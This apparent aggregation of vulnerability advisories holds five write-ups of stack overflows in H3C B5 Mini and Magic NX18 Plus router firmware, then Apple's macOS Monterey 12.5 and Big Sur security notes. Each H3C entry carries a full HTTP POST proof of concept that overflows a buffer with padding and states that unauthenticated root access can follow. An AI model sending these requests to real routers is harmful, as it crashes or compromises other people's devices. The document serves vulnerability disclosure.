H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function Asp_SetTimingtimeWifiAndLed.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the Asp\_SetTimingtimeWifiAndLed function. An attacker can obtain a stable root shell through a carefully constructed payload.

!\[image-20220720231031268\](D:\\vuln\\H3C\\H3C B5Mini\\5\\img\\image-20220720231031268.png)

In the Asp_SetTimingtimeWifiAndLed function, the V11(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Asp_SetTimingtimeWifiAndLed&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36468: vuln/readme.md at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function SetAPWifiorLedInfoById.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the SetAPWifiorLedInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAPWifiorLedInfoById function, V7(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V11, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 546
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAPWifiorLedInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36469: vuln/readme.md at main · Darry-lang1/vuln

H3C Magic NX18 Plus NX18PV100R003 was discovered to contain a stack overflow via the function Asp_SetTimingtimeWifiAndLed.

**H3C Magic NX18 Plus NX18PV100R003 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202103/1389284\_30005\_0.htm

**Product Information**

H3C NX18 Plus NX18PV100R003 router, the latest version of simulation overview：

**Vulnerability details**

The H3C NX18 Plus NX18PV100R003 router was found to have a stack overflow vulnerability in the Asp\_SetTimingtimeWifiAndLed function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the Asp_SetTimingtimeWifiAndLed function, the param we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V22, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.124.1:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.124.1:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Asp_SetTimingtimeWifiAndLed&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36498: vuln/H3C/H3C NX18 Plus/3 at main · Darry-lang1/vuln

H3C Magic NX18 Plus NX18PV100R003 was discovered to contain a stack overflow via the function SetAPWifiorLedInfoById.

**H3C Magic NX18 Plus NX18PV100R003 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202103/1389284\_30005\_0.htm

**Product Information**

H3C NX18 Plus NX18PV100R003 router, the latest version of simulation overview：

**Vulnerability details**

The H3C NX18 Plus NX18PV100R003 router was found to have a stack overflow vulnerability in the SetAPWifiorLedInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAPWifiorLedInfoById function, the param we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.124.1:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.124.1:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAPWifiorLedInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36493: vuln/H3C/H3C NX18 Plus/8 at main · Darry-lang1/vuln

H3C B5 Mini B5MiniV100R005 was discovered to contain a stack overflow via the function SetAP5GWifiById.

**H3C B5 Mini B5MiniV100R005 has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202007/1311628\_30005\_0.htm

**Product Information**

H3C B5 Mini B5MiniV100R005 router, the latest version of simulation overview：

**Vulnerability details**

The H3C B5 Mini B5MiniV100R005 router was found to have a stack overflow vulnerability in the SetAP5GWifiById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAP5GWifiById function, V5(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V8, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 536
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: LOGIN_PSD_REM_FLAG=0; PSWMOBILEFLAG=true
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAP5GWifiById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell without authorization.

CVE-2022-36470: vuln/readme.md at main · Darry-lang1/vuln

Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.5, watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6. An app may be able to disclose kernel memory.

Released July 20, 2022

**APFS**

Available for: macOS Monterey

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32832: Tommy Muir (@Muirey03)

**AppleMobileFileIntegrity**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32810: Mohamed Ghannam (@\_simo36)

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32840: Mohamed Ghannam (@\_simo36)

**Apple Neural Engine**

Available for: macOS Monterey

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-32845: Mohamed Ghannam (@\_simo36)

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: This issue was addressed with improved checks.

CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py\_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32851: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32852: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32853: Ye Zhang (@co0py\_Cat) of Baidu Security

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32831: Ye Zhang (@co0py\_Cat) of Baidu Security

**Audio**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32820: an anonymous researcher

**Audio**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32825: John Aakerblom (@jaakerblom)

**Automation**

Available for: macOS Monterey

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved checks.

CVE-2022-32789: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Calendar**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: The issue was addressed with improved handling of caches.

CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

**CoreMedia**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom (@jaakerblom)

**CoreText**

Available for: macOS Monterey

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32839: STAR Labs (@starlabs\_sg)

**File System Events**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32819: Joshua Mason of Mandiant

**GPU Drivers**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: Multiple out-of-bounds write issues were addressed with improved bounds checking.

CVE-2022-32793: an anonymous researcher

**GPU Drivers**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-32821: John Aakerblom (@jaakerblom)

**iCloud Photo Library**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2022-32849: Joshua Jones

**ICU**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may result in disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32841: hjy79425575

 **ImageIO**

 Available for: macOS Monterey

 Impact: Processing an image may lead to a denial-of-service

 Description: A null pointer dereference was addressed with improved validation.

 CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2022-32811: ABC Research s.r.o

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

**Kernel**

Available for: macOS Monterey

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32813: Xinru Chi of Pangu Lab

CVE-2022-32815: Xinru Chi of Pangu Lab

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32817: Xinru Chi of Pangu Lab

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: This issue was addressed with improved checks.

CVE-2022-32829: an anonymous researcher

**Liblouis**

Available for: macOS Monterey

Impact: An app may cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China (nipc.org.cn)

**libxml2**

Available for: macOS Monterey

Impact: An app may be able to leak sensitive user information

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-32823

**Multi-Touch**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

**Multi-Touch**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: An issue in the handling of environment variables was addressed with improved validation.

CVE-2022-32786: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved checks.

CVE-2022-32800: Mickey Jin (@patch1t)

**PluginKit**

Available for: macOS Monterey

Impact: An app may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

**PS Normalizer**

Available for: macOS Monterey

Impact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

**SMB**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-32796: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32842: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32798: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: A user in a privileged network position may be able to leak sensitive information

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32799: Sreejith Krishnan R (@skr0x1c0)

**SMB**

Available for: macOS Monterey

Impact: An app may be able to leak sensitive kernel state

Description: The issue was addressed with improved memory handling.

CVE-2022-32818: Sreejith Krishnan R (@skr0x1c0)

**Software Update**

Available for: macOS Monterey

Impact: A user in a privileged network position can track a user’s activity

Description: This issue was addressed by using HTTPS when sending information over the network.

CVE-2022-32857: Jeffrey Paul (sneak.berlin)

**Spindump**

Available for: macOS Monterey

Impact: An app may be able to overwrite arbitrary files

Description: This issue was addressed with improved file handling.

CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

**Spotlight**

Available for: macOS Monterey

Impact: An app may be able to gain root privileges

Description: This issue was addressed with improved checks.

CVE-2022-32801: Joshua Mason (@josh@jhu.edu)

**subversion**

Available for: macOS Monterey

Impact: Multiple issues in subversion

Description: Multiple issues were addressed by updating subversion.

CVE-2021-28544: Evgeny Kotkov, visualsvn.com

CVE-2022-24070: Evgeny Kotkov, visualsvn.com

CVE-2022-29046: Evgeny Kotkov, visualsvn.com

CVE-2022-29048: Evgeny Kotkov, visualsvn.com

**TCC**

Available for: macOS Monterey

Impact: An app may be able to access sensitive user information

Description: An access issue was addressed with improvements to the sandbox.

CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**WebKit**

Available for: macOS Monterey

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: The issue was addressed with improved UI handling.

WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@\_manfp) working with Trend Micro Zero Day Initiative

**WebRTC**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution.

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 242339  
CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team

**Wi-Fi**

Available for: macOS Monterey

Impact: An app may be able to cause unexpected system termination or write kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32837: Wang Yu of Cyberserval

**Wi-Fi**

Available for: macOS Monterey

Impact: A remote user may be able to cause unexpected system termination or corrupt kernel memory

Description: This issue was addressed with improved checks.

CVE-2022-32847: Wang Yu of Cyberserval

**Windows Server**

Available for: macOS Monterey

Impact: An app may be able to capture a user’s screen

Description: A logic issue was addressed with improved checks.

CVE-2022-32848: Jeremy Legendre of MacEnhance

CVE-2022-32793: About the security content of macOS Monterey 12.5

A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Monterey 12.5, macOS Big Sur 11.6.8, Security Update 2022-005 Catalina. An app may be able to execute arbitrary code with kernel privileges.

Released July 20, 2022

**APFS**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32832: Tommy Muir (@Muirey03)

**AppleMobileFileIntegrity**

Available for: macOS Big Sur

Impact: An app may be able to gain root privileges

Description: An authorization issue was addressed with improved state management.

CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: This issue was addressed with improved checks.

CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py\_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-32853: Ye Zhang (@co0py\_Cat) of Baidu Security

CVE-2022-32851: Ye Zhang (@co0py\_Cat) of Baidu Security

**AppleScript**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-32831: Ye Zhang (@co0py\_Cat) of Baidu Security

**Audio**

Available for: macOS Big Sur

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-32825: John Aakerblom (@jaakerblom)

**Audio**

Available for: macOS Big Sur

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-32820: an anonymous researcher

**Calendar**

Available for: macOS Big Sur

Impact: An app may be able to access sensitive user information

Description: The issue was addressed with improved handling of caches.

CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

**Calendar**

Available for: macOS Big Sur

Impact: An app may be able to access user-sensitive data

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2022-32849: Joshua Jones

**CoreText**

Available for: macOS Big Sur

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2022-32839: STAR Labs (@starlabs\_sg)

**FaceTime**

Available for: macOS Big Sur

Impact: An app with root privileges may be able to access private information

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-32781: Wojciech Reguła (@\_r3ggi) of SecuRing

**File System Events**

Available for: macOS Big Sur

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-32819: Joshua Mason of Mandiant

**ICU**

Available for: macOS Big Sur

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**ImageIO**

Available for: macOS Big Sur

Impact: Processing an image may lead to a denial-of-service

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)
